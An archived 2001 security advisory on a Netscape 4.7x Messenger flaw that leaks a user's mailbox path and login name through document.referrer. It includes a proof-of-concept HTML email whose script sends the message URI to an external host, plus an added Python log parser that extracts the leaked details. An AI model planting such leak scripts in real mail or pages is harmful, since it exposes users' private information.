securityvulns SECURITYVULNS:DOC:1687
History: Jun 05, 2001 - 12:00 a.m.

SECURITY.NNOV: Netscape 4.7x Messenger user information retrieval

2001-06-05 00:00:00
vulners.com

There are known bugs in Netscape whose exploitation requires knowing the
location of the user's files. This bug is not a serious one by itself,
but it allows that location to be obtained.

Topic : Netscape 4.7x user information retrieval
Author : 3APA3A <[email protected]>
Affected software : Netscape 4.7x All Platforms
Vendor : Netscape (IPlanet)
Risk : Low
Remotely Exploitable : Yes
Released : 30 May 2001
Vendor URL : http://www.netscape.com
SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories

Background:

Netscape Messenger uses an internal protocol called mailbox://. The
format of a mailbox URI is

mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber

This URI contains the full path to the user's mailbox, which usually
contains the user's login name and, on Windows 9x, the path to the
Netscape installation. It is impossible to determine this location from
javascript inside an e-mail message, because Netscape hides
document.location from javascript.

Problem:

It is possible to retrieve the mailbox:// URI of the message, and with it
the mailbox location, the user's system login name and, in some cases,
the path to the Netscape installation.

Details:

When a link is followed from a message, Netscape sets the "document.referrer"
property of the target page to the URI of the message that contained the
link. Javascript on the target page can read this property and send it to
any location, together with the IP address of the calling machine.
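As an added example (not part of the advisory), a Python check that a web site operator could run over their own access log to see whether visitors arrive with a mailbox:// Referer, and exactly which pieces of user information such a URI exposes. The log lines are constructed, and the login-name and install-path heuristic is an assumption, not something the advisory states.

```python
import re
from urllib.parse import parse_qs, unquote

# Combined Log Format; group 1 = client IP, group 2 = Referer.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "([^"]*)" "[^"]*"$')

# Constructed sample log lines (assumption): two Netscape users who followed a
# link from a message, one ordinary visitor. The mailbox:// values follow the
# advisory's format mailbox://full_path_to_user_folder?ID=...&number=...
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jun/2001:10:15:02 +0400] "GET /files/nsdemo.asp HTTP/1.0" 200 512 "mailbox:///home/jsmith/nsmail/Inbox?ID=%3C12345.67%40example.test%3E&number=4711" "Mozilla/4.75 [en] (X11; U; Linux 2.2.16 i686)"
192.0.2.11 - - [05/Jun/2001:10:16:30 +0400] "GET /files/nsdemo.asp HTTP/1.0" 200 512 "mailbox://C|/Program%20Files/Netscape/Users/anna/Mail/Inbox?ID=%3Cabc%40example.test%3E&number=12" "Mozilla/4.7 [en] (Win98; U)"
192.0.2.12 - - [05/Jun/2001:10:17:05 +0400] "GET /index.html HTTP/1.0" 200 1024 "http://www.example.test/" "Mozilla/4.7 [en] (Win98; U)"
"""

def parse_mailbox_uri(uri):
    """Break a mailbox:// URI into the user information it carries.
    Returns None for any other scheme."""
    if not uri.lower().startswith("mailbox://"):
        return None
    path, _, query = uri[len("mailbox://"):].partition("?")
    folder = unquote(path)
    params = parse_qs(query)
    parts = [p for p in folder.split("/") if p]
    login = install = None
    # Heuristic (assumption, not from the advisory): the login name follows a
    # "home" (Unix) or "Users" (Netscape profile dir) component, and on Windows
    # everything before "Users" is the Netscape installation directory.
    for i, p in enumerate(parts[:-1]):
        if p.lower() in ("home", "users"):
            login = parts[i + 1]
            if p.lower() == "users":
                install = ("/" if folder.startswith("/") else "") + "/".join(parts[:i])
            break
    return {"folder": folder, "login": login, "install": install,
            "message_id": params.get("ID", [None])[0],
            "number": params.get("number", [None])[0]}

def find_mailbox_referrers(log_text):
    """One record per line whose Referer is a mailbox:// URI, i.e. a Netscape
    Messenger user who reached this site by clicking a link inside a message."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (info := parse_mailbox_uri(m.group(2))):
            info["client"] = m.group(1)
            hits.append(info)
    return hits
```

Running find_mailbox_referrers(SAMPLE_LOG) reports the two Messenger visitors with their mailbox folder, login name, message ID and, for the Windows 9x user, the Netscape installation directory.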

Exploitation:

If you read this message with Netscape Messenger you can simply follow the
reference http://www.security.nnov.ru/files/nsdemo.asp to see your
mailbox location, or a Netscape user can be forced to open this page with
a message like this:

-=-=-=-=-=-=-=-=-=-
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html

<html><script>
window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
</script>
<A
HREF="http://www.security.nnov.ru/files/nsdemo.asp"
>
http://www.security.nnov.ru/files/nsdemo.asp
</A>
</html>
-=-=-=-=-=-=-=-=-=-

Vendor:

Netscape was contacted on May 30, 2001 via
http://help.netscape.com/forms/bug-security.html
No feedback was given.


http://www.security.nnov.ru
You know my name - look up my number (The Beatles)